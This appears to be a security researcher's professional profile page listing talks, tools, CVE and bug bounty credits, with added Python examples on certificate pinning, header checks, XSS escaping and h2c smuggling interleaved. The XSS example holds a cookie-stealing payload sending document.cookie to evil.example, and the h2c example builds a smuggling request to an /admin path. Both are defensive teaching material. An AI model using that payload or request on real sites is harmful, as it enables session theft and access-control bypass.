«I had the honor and pleasure of having Ricardo in the organization that I recently led for four years. He is an incredible person, both professionally and personally. Ricardo is incredibly knowledgeable about cybersecurity, but always accessible and always willing to help. He uses his skills to best serve his colleagues and his enterprise - and these skills cover red teaming, cloud security, exploit tool knowledge, tool creation, you name it. I am so glad I had the opportunity to watch Ricardo at work, and he's a true asset to anyone he works with.»
About
Experience and education
Licenses and certifications
MCSO - Modulo Certified Security Officer
Módulo Security Solutions
Credential ID: MCSO 1.120/10
Volunteer experience
HP Global Social Innovation
HP
1 year 1 month
Civil rights and social action
Hewlett Packard (HP) and Junior Achievement – Young Enterprise Europe (JA-YE Europe) have launched a new enterprise education program to encourage more young people around the world to become social innovators.
In the pilot year, over 14,000 students in 13 countries (Brazil, Bulgaria, China, Egypt, , India, Kenya, Romania, Russia, Slovakia, South Africa, United Kingdom and USA) will be challenged to tackle some of society’s biggest challenges in an online ‘Social Innovation Relay’, and a total of 55,000 students will participate in educational activities related to the relay.
Facebook page: https://www.facebook.com/SocialInnovationRelay.
HP Global Volunteer Challenge
HP
3 years 1 month
Children
Trying to make life better for 44 children from "Centro Educacional Catarina Kentenich" who were assaulted or taken from their homes because of drugs.
Publications
OWASP Secure Headers Project (Mind The Sec 2016)
http://mindthesec.com.br/ricardo-iramar-dos-santos
HTTP headers are well known and also despised. Seeking a balance between usability and security, developers implement functionality through headers that can make an application more versatile or more secure. But in practice, how are the headers being implemented? Which sites follow the best implementation practices? Big companies, small ones, all or none?
Setting headers from the server is easy and often doesn't require any code changes. Once set, they can restrict modern browsers from running into easily preventable vulnerabilities. The OWASP Secure Headers Project intends to raise awareness and use of these headers.
We aim to publish reports on header usage stats, developments and changes; code libraries that make these headers easily accessible to developers on a range of platforms; and data sets concerning the general usage of these headers.
Slides: https://drive.google.com/file/d/0B_hCIsQuJ1irRE5kZW9mbzBvOGs/view?usp=sharing
Validating Certificates and Public Key Pinning (BSidesSP 12)
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_12/Palestras#Validating_Certificates_and_Public_Key_Pinning
In 2012 the paper "The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software" made it clear how many mobile applications were vulnerable to man-in-the-middle attacks. Today, with the growth of IoT, this problem becomes even more dangerous. This talk gives you the concepts of certificate validation (client side) and Public Key Pinning.
Slides: https://docs.google.com/presentation/d/1GODt8n4pV44KC5wMGlJIROWKZLODgE650Kfsgb7vZGY/present
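An added example, not the talk's own code, of the client-side check the talk is about: after the TLS library has validated the chain and the hostname, extract the SubjectPublicKeyInfo (SPKI) from the peer's DER certificate, hash it and compare it against a pinned set. The DER helpers, the Ed25519 OID constant and the skeleton certificate are constructed for the demonstration (the skeleton is not a valid or signed certificate, only enough structure to exercise the parser); a real client would feed in `sock.getpeercert(binary_form=True)` from an `ssl` socket created with `CERT_REQUIRED` and `check_hostname` enabled, and treat the pin check as an extra gate, never as a replacement for chain validation.

```python
"""Public key pinning on top of normal certificate validation: extract the
SPKI from a DER certificate, hash it, compare with a pin set.
Added example; the certificate below is a constructed DER skeleton."""
import base64
import hashlib


def _der_len(n: int) -> bytes:
    """DER length encoding: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, content: bytes) -> bytes:
    """Build one DER tag-length-value element."""
    return bytes([tag]) + _der_len(len(content)) + content


def der_children(seq_content: bytes) -> list:
    """Split the content of a DER SEQUENCE into its child TLV elements
    (single-byte tags only, which is all X.509 needs here)."""
    out, i = [], 0
    while i < len(seq_content):
        start = i
        i += 1                                  # tag byte
        first = seq_content[i]
        i += 1
        if first & 0x80:                        # long-form length
            nbytes = first & 0x7F
            length = int.from_bytes(seq_content[i:i + nbytes], "big")
            i += nbytes
        else:
            length = first
        i += length
        out.append(seq_content[start:i])
    return out


def der_content(elem: bytes) -> bytes:
    """Strip tag and length from one TLV element."""
    first = elem[1]
    header = 2 + ((first & 0x7F) if first & 0x80 else 0)
    return elem[header:]


def extract_spki(cert_der: bytes) -> bytes:
    """SPKI is the 6th field of tbsCertificate once the optional [0] version is
    skipped: serial, signature alg, issuer, validity, subject, SPKI."""
    tbs = der_children(der_content(cert_der))[0]
    fields = der_children(der_content(tbs))
    if fields[0][0] == 0xA0:                    # explicit [0] version present
        fields = fields[1:]
    return fields[5]


def spki_pin(spki_der: bytes) -> str:
    """Pin format used by HPKP and OkHttp: base64(SHA-256(SPKI DER))."""
    return base64.b64encode(hashlib.sha256(spki_der).digest()).decode()


def check_pins(cert_der: bytes, pins: set) -> bool:
    """True only if the peer's SPKI hash is in the pinned set."""
    return spki_pin(extract_spki(cert_der)) in pins


# ---- constructed skeleton certificate (not a real, signed certificate) ----
ED25519_OID = bytes.fromhex("06032b6570")                  # OID 1.3.101.112
FAKE_PUBKEY = bytes(range(32))                             # constructed key bytes
SPKI = tlv(0x30, tlv(0x30, ED25519_OID) + tlv(0x03, b"\x00" + FAKE_PUBKEY))
TBS = tlv(0x30,
          tlv(0xA0, tlv(0x02, b"\x02"))                    # version v3
          + tlv(0x02, b"\x01")                             # serial
          + tlv(0x30, ED25519_OID)                         # signature algorithm
          + tlv(0x30, b"")                                 # issuer (left empty)
          + tlv(0x30, b"")                                 # validity (left empty)
          + tlv(0x30, b"")                                 # subject (left empty)
          + SPKI)
CERT = tlv(0x30, TBS + tlv(0x30, ED25519_OID) + tlv(0x03, b"\x00" + bytes(64)))

if __name__ == "__main__":
    print("pin:", spki_pin(SPKI), "accepted:", check_pins(CERT, {spki_pin(SPKI)}))
```

Pin the SPKI rather than the whole leaf certificate so the pin survives renewals that keep the same key, and ship at least one backup pin for a key held offline; otherwise a routine key rotation locks every pinned client out.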
HTTP Headers. A hidden world. (SECOMP Unicamp 2015)
http://www.secomp.com.br/palestras
HTTP headers are well known and also despised. Seeking a balance between usability and security, developers implement functionality through headers that can make an application more versatile or more secure. But in practice, how are the headers being implemented? Which sites follow the best implementation practices? Big companies, small ones, all or none?
Slides: https://prezi.com/m9suylkg1_n2/http-headers/
HTTP Headers. A hidden world. (BSidesSP 11)
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/Palestras#HTTP_Headers._A_hidden_world
HTTP headers are well known and also despised. Seeking a balance between usability and security, developers implement functionality through headers that can make an application more versatile or more secure. But in practice, how are the headers being implemented? Which sites follow the best implementation practices? Big companies, small ones, all or none?
Slides: https://prezi.com/hkganvlwdspx/http-headers-v0/
HTTP Headers. A hidden world. (CryptoRave 2015)
https://cryptorave.org/#programacao
HTTP headers are well known and also despised. Seeking a balance between usability and security, developers implement functionality through headers that can make an application more versatile or more secure. But in practice, how are the headers being implemented? Which sites follow the best implementation practices? Big companies, small ones, all or none?
Slides: https://prezi.com/hkganvlwdspx/http-headers-v0/
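As an added example that is not part of the talk materials or of the OWASP project's code, and covering both the OWASP Secure Headers Project entry and the "HTTP Headers. A hidden world." talks above: a small checker that parses a captured HTTP response head and flags missing or weak values for the headers the project tracks. The sample response, the six-month HSTS floor and the exact set of checks are assumptions made for the example.

```python
"""Check a captured HTTP response head for the headers covered by the OWASP
Secure Headers Project and flag missing or weak values.
Added example; the sample response below is constructed."""
import re

# Assumption for this example: HSTS max-age below six months is reported as weak.
MIN_HSTS_MAX_AGE = 15_552_000

# Constructed sample: a raw HTTP/1.1 response as a client would receive it.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Strict-Transport-Security: max-age=300\r\n"
    "Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "\r\n"
    "<html>...</html>"
)


def parse_headers(raw: str) -> dict:
    """Parse a raw response head into a lower-cased name -> value map.
    Repeated headers are joined with ', ' as RFC 9110 allows."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: dict = {}
    for line in head.split("\r\n")[1:]:          # [0] is the status line
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return headers


def check_security_headers(headers: dict) -> list:
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    h = {k.lower(): v for k, v in headers.items()}

    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("missing Strict-Transport-Security")
    else:
        m = re.search(r"max-age=(\d+)", hsts, re.I)
        if not m or int(m.group(1)) < MIN_HSTS_MAX_AGE:
            findings.append(f"weak HSTS max-age: {hsts}")

    csp = h.get("content-security-policy")
    if csp is None:
        findings.append("missing Content-Security-Policy")
    elif "'unsafe-inline'" in csp or "'unsafe-eval'" in csp:
        findings.append(f"CSP allows unsafe-inline/unsafe-eval: {csp}")

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")

    # Clickjacking: either a frame-ancestors directive or X-Frame-Options counts.
    if "frame-ancestors" not in (csp or "") and "x-frame-options" not in h:
        findings.append("no clickjacking protection (frame-ancestors / X-Frame-Options)")

    if "referrer-policy" not in h:
        findings.append("missing Referrer-Policy")
    if "permissions-policy" not in h:
        findings.append("missing Permissions-Policy")

    # Information leakage: version numbers in Server / X-Powered-By.
    for leak in ("server", "x-powered-by"):
        if re.search(r"\d", h.get(leak, "")):
            findings.append(f"{leak} header leaks a version: {h[leak]}")
    return findings


if __name__ == "__main__":
    for finding in check_security_headers(parse_headers(SAMPLE_RESPONSE)):
        print("-", finding)
```

Run it against responses captured with `curl -sI` or from a proxy to get the per-site picture the talks ask about; the sample above produces six findings, and only the X-Frame-Options check passes.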
XSS more than a simple alert("XSS") (BSidesSP 10)
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_10/Palestras#XSS_more_than_a_simple_alert.28.22XSS.22.29
Usually an XSS (Cross Site Scripting) is demonstrated by running a simple JavaScript "alert box", which does not show the real impact that can be caused. This talk shows the real impact an XSS can have and how to prevent it.
Slides: https://docs.google.com/presentation/d/1hV7rANhwTVxKRGP487hGJRgZ-1TySGSh6N_DpE5NFzM/present
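An added example (not the talk's slides or code) of the prevention half of the talk: the same untrusted value rendered unescaped, HTML-escaped for a text/attribute context, and escaped for a JavaScript string context, with an HTMLParser-based audit showing which output still carries an injected tag or event handler. The payload and the templates are constructed for the example.

```python
"""The same untrusted value rendered unescaped, HTML-escaped and JS-escaped,
plus a parser-based audit of what a browser would actually see.
Added example; the payload and the templates are constructed."""
import html
import json
from html.parser import HTMLParser

# Constructed payload: breaks out of an attribute and exfiltrates cookies.
PAYLOAD = '"><img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">'


def render_vulnerable(name: str) -> str:
    """Untrusted input concatenated straight into markup. The browser parses the
    payload as a new tag whose handler runs with the page's origin (cookies,
    DOM, authenticated same-origin requests), far beyond an alert()."""
    return f'<p>Hello <span title="{name}">{name}</span></p>'


def render_html_escaped(name: str) -> str:
    """html.escape(quote=True) also escapes double and single quotes, so the
    value can neither close the attribute nor start a tag."""
    safe = html.escape(name, quote=True)
    return f'<p>Hello <span title="{safe}">{safe}</span></p>'


def render_js_context(name: str) -> str:
    """Data inside <script> needs JS-string escaping, not HTML escaping.
    json.dumps quotes it; rewriting '<' as a \\u003c escape stops a '</script>'
    inside the value from terminating the script element early."""
    literal = json.dumps(name).replace("<", "\\u003c")
    return f"<script>var user = {literal};</script>"


class TagAudit(HTMLParser):
    """Collect every start tag and every on* attribute the HTML parser sees."""

    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [a for a, _ in attrs if a.startswith("on")]


def unexpected_markup(fragment: str, allowed=("p", "span")) -> bool:
    """True if the fragment contains a tag outside the template's own tags or
    any event-handler attribute, i.e. the input has become markup."""
    audit = TagAudit()
    audit.feed(fragment)
    return bool(audit.handlers) or any(t not in allowed for t in audit.tags)


if __name__ == "__main__":
    for fragment in (render_vulnerable(PAYLOAD), render_html_escaped(PAYLOAD)):
        print(unexpected_markup(fragment), fragment)
    print(render_js_context("</script><script>alert(1)</script>"))
```

The escaping function has to match the context the value lands in (HTML text, attribute, JavaScript string, URL); a template engine with contextual auto-escaping does this for you, and a Content-Security-Policy without 'unsafe-inline' limits what an injection that slips through can still do.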
The man-in-the-middle attack (BSidesSP 8)
https://www.garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_8/Palestras#The_man-in-the-middle_attack
The man-in-the-middle attack is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
Slides: http://slides.com/riramar/mitm
Basic cryptography (BSidesSP 4)
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_4/Basic_Cryptography
An overview about basic cryptography.
Slides: http://ricardo-iramar.com.br/docs/Basic%20Cryptography.pptx
Video: http://www.youtube.com/watch?v=hNadQku3AO0
Slackware Zine Ed. 4
http://www.slackzine.com.br
Installing Slackware through NFS or FTP.
Projects
SmuggleTP
A straightforward tool for exploiting SMTP Smuggling vulnerabilities.
HueBR Challenge 01
This is my first web challenge called "HueBR Challenge 01". Can you get the flag.html?
h2csmuggler-proxy
h2cSmuggler smuggles HTTP traffic past insecure edge-server proxy_pass configurations by establishing HTTP/2 cleartext (h2c) communications with h2c-compatible back-end servers, allowing a bypass of proxy rules and access controls.
This script just implements a proxy over h2cSmuggler so you can navigate in your browser, making requests to the back-end server.
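An added example, not h2cSmuggler's or this proxy's code, showing both sides of the technique described above: the HTTP/1.1 request that asks for an h2c upgrade (with the HTTP2-Settings header encoded the way RFC 7540 requires) and the hop-by-hop header stripping an edge proxy must apply so that the Upgrade never reaches the back end. Host names and paths are constructed.

```python
"""An h2c upgrade request of the kind h2cSmuggler sends, and the edge-side
hop-by-hop stripping that stops it from reaching the back end.
Added example; host names and paths are constructed."""
import base64
import struct

# RFC 7540 SETTINGS identifiers carried in the HTTP2-Settings header.
SETTINGS_MAX_CONCURRENT_STREAMS = 0x3
SETTINGS_INITIAL_WINDOW_SIZE = 0x4


def encode_http2_settings(settings: dict) -> str:
    """HTTP2-Settings value: a SETTINGS frame payload (16-bit id, 32-bit value
    per entry), base64url-encoded without padding (RFC 7540 section 3.2.1)."""
    payload = b"".join(struct.pack("!HI", k, v) for k, v in settings.items())
    return base64.urlsafe_b64encode(payload).rstrip(b"=").decode()


def build_h2c_upgrade(host: str, path: str) -> bytes:
    """The request a client sends to ask an HTTP/1.1 listener to switch to h2c.
    If the proxy relays Upgrade and the back end answers 101, the rest of the
    TCP connection carries HTTP/2 frames the proxy no longer inspects."""
    settings = encode_http2_settings({SETTINGS_MAX_CONCURRENT_STREAMS: 100,
                                      SETTINGS_INITIAL_WINDOW_SIZE: 65535})
    lines = [f"GET {path} HTTP/1.1",
             f"Host: {host}",
             "Upgrade: h2c",
             f"HTTP2-Settings: {settings}",
             "Connection: Upgrade, HTTP2-Settings",
             "", ""]
    return "\r\n".join(lines).encode()


def parse_request_head(raw: bytes) -> tuple:
    """Split a raw request head into (request line, [(name, value), ...])."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode()
    request_line, *header_lines = head.split("\r\n")
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return request_line, headers


def is_h2c_upgrade(headers: list) -> bool:
    """Detection: does any Upgrade header offer the h2c protocol?"""
    return any(tok.strip().lower() == "h2c"
               for n, v in headers if n.lower() == "upgrade"
               for tok in v.split(","))


def strip_hop_by_hop(headers: list) -> list:
    """What the edge proxy must do (RFC 7230 section 6.1): drop Connection,
    every header Connection names, and Upgrade, instead of relaying them."""
    named = set()
    for n, v in headers:
        if n.lower() == "connection":
            named |= {t.strip().lower() for t in v.split(",")}
    drop = named | {"connection", "upgrade", "http2-settings",
                    "keep-alive", "proxy-connection"}
    return [(n, v) for n, v in headers if n.lower() not in drop]


if __name__ == "__main__":
    raw = build_h2c_upgrade("backend.internal", "/admin")     # constructed target
    print(raw.decode())
    line, hdrs = parse_request_head(raw)
    print("h2c upgrade attempted:", is_h2c_upgrade(hdrs))
    print("forwarded after stripping:", strip_hop_by_hop(hdrs))
```

The same check can be pointed at proxy access logs: a 101 response to a request carrying `Upgrade: h2c` through an edge that should terminate HTTP/1.1 is the signature of a successful smuggle.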
OWASP Top 10 2017
Just small contributions to OWASP Top 10 2017 A6 - Security Misconfiguration with the OWASP Secure Headers Project and some other stuff.
OWASP Android Public Key Pinning Example
Just another example of Android Public Key Pinning.
Reference: https://www.owasp.org/index.php?title=Certificate_and_Public_Key_Pinning&oldid=216156#Android
HP Commercial Cloud Platform
Secure Product Development Lifecycle.
HP SILAS: Security Intelligence-as-a-Service
SILAS aims at providing key decision makers within organisations with strategic metrics, predictions and "what-if" analysis (leveraging HP Security Analytics) for risk assessment, scenario planning and decision making.
SILAS uses information provided by current SIM/SEM solutions (e.g. HP ArcSight), threat intelligence services (e.g. HP DV Labs and HP TippingPoint/ThreatLinQ) and other logging systems to ground the statistical estimation of risk metrics and to provide input parameters to HP Security Analytics’ predictive metrics and simulations.
Honors and awards
CVE-2023-22247 - Blind XPath Injection
https://helpx.adobe.com/security/products/magento/apsb23-17.html
Vulnerability Category: XML Injection (aka Blind XPath Injection) (CWE-91)
Vulnerability Impact: Arbitrary file system read
Severity: Critical
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Google Hall of Fame
https://www.google.com/about/appsecurity/hall-of-fame/archive/
Found an interesting issue similar to Subdomain Takeover and got a low bounty reward.
Apple Security Bounty
https://.apple.com/en-us/HT201536
2021-03-04 wfo-mdn.apple.com
A server configuration issue was addressed. We would like to acknowledge Ricardo Iramar dos Santos (linkedin.com/in/iramar/) for reporting this issue.
United Nations Information Security Hall of Fame
https://unite.un.org/content/hall-fame
Reported broken authentication vulnerability on un.org.
29 March 2021
Apple Security Bounty
https://.apple.com/en-us/HT201536
2021-02-08 sscontent.apple.com
A server configuration issue was addressed. We would like to acknowledge Ricardo Iramar dos Santos (linkedin.com/in/iramar/) for reporting this issue.
Top 10 web hacking techniques of 2020 nomination - The Powerful HTTP Request Smuggling 💪
https://portswigger.net/research/top-10-web-hacking-techniques-of-2020-nominations-open
2020 was not an ideal year for many of us, but that didn't stop the security community from sharing a broad array of novel research ranging from creative iterations on existing work to entire new attack concepts. Keeping up with this flood of posts can be exhausting in the best of times, so every year we collaborate with the community to first identify all the key research releases, then whittle the list down to the top ten must-see new techniques.
https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142
Apple Security Bounty
https://.apple.com/en-us/HT201536
2020-12-03 ecommerce.apple.com
A server configuration issue was addressed. We would like to acknowledge Ricardo Iramar dos Santos (linkedin.com/in/iramar/) for reporting this issue.
Apple Security Bounty
https://.apple.com/en-us/HT201536
2020-11-26 apple.com
A server configuration issue was addressed. We would like to acknowledge Ricardo Iramar dos Santos (linkedin.com/in/iramar/) for reporting this issue.
Citrix Hall of Fame (HTTP Request Smuggling attacks on Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP)
Citrix
Security enhancements to help protect customers against HTTP Request Smuggling attacks have been added to Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP.
References:
- https://.citrix.com/article/CTX281474
- https://.citrix.com/article/CTX282268
- https://www.citrix.com/about/trust-center/vulnerability-process.htm (Hall of Fame)
Apple Security Bounty
https://.apple.com/en-us/HT201536
2020-08-21 usaus1-labclient-vpn3.apple.com
A server configuration issue was addressed.
Most Valuable Hacker (Third Place) on Hacking Meetup Mercado Livre Brasil 2020
Mercado Livre
Global CyberLympics World 2019 Finalist
EC-Council Foundation
Global CyberLympics is an international online cyber security competition, dedicated to finding the top computer network defense teams. This event tests the skills of information assurance professionals in teams of 4 to 6 people in the areas of ethical hacking, computer network defense and computer forensics. Each round serves as an elimination round until only winning teams remain. The top winning teams from every continent get invited to play the game live in person at the world finals.
Global CyberLympics aspires to create an opportunity for ethical hacking to be accepted, practiced and demonstrated without any discrimination, across all geographical boundaries – for the purpose of understanding what it takes to protect and secure critical information and assets. One key initiative for Global CyberLympics is to foster an environment that creates child online protection through education.
Global CyberLympics World 2018 Finalist
EC-Council Foundation
Global CyberLympics is an international online cyber security competition, dedicated to finding the top computer network defense teams. This event tests the skills of information assurance professionals in teams of 4 to 6 people in the areas of ethical hacking, computer network defense and computer forensics. Each round serves as an elimination round until only winning teams remain. The top winning teams from every continent get invited to play the game live in person at the world finals.
Global CyberLympics aspires to create an opportunity for ethical hacking to be accepted, practiced and demonstrated without any discrimination, across all geographical boundaries – for the purpose of understanding what it takes to protect and secure critical information and assets. One key initiative for Global CyberLympics is to foster an environment that creates child online protection through education.
Best student of electrical engineering
CREA (Conselho Regional Engenharia Arquitetura)
Recognized by CREA with highest honors as the best electrical engineering student of 2002.
Languages
English
Full professional proficiency
Spanish
Elementary proficiency
Portuguese
Native or bilingual proficiency
Recommendations received
29 people have recommended Ricardo